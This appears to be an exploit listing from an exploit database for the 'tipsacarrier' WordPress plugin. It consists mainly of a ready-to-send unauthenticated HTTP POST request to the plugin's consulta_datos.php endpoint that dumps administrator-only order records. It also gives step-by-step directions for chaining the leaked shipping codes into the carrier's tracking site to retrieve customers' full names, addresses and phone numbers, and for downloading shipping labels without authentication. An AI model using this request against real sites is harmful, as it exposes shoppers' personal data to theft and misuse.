## https://sploitus.com/exploit?id=WPEX-ID:B14F476E-3124-4CBF-91B4-AE53C4DABD7C
POST /wp-content/plugins/tipsacarrier/js/consulta_datos.php HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 59
Connection: close
Upgrade-Insecure-Requests: 1
page=1&rows=5000&sidx=id_envio_order&sord=DESC&_search=true
The response includes the same data that only an administrator in the plugin page can see. Including:
- The [orderid] number.
- [creation date] for the order.
- The [shipping agency order code] which you can use at the agency website tracking URL: https://dinapaqweb.tipsa-dinapaq.com/dinapaqweb/detalle_envio.php?servicio=[shipping agency order code]&fecha=[creation date in dd/mm/YYYY format] to retrieve client full address, full name, phone, and other data.
- The order shipping status [shipping agency status].
- An URL where you can download the printing tag accessing to [printing tag url] with no authentication, located in /wp-content/uploads.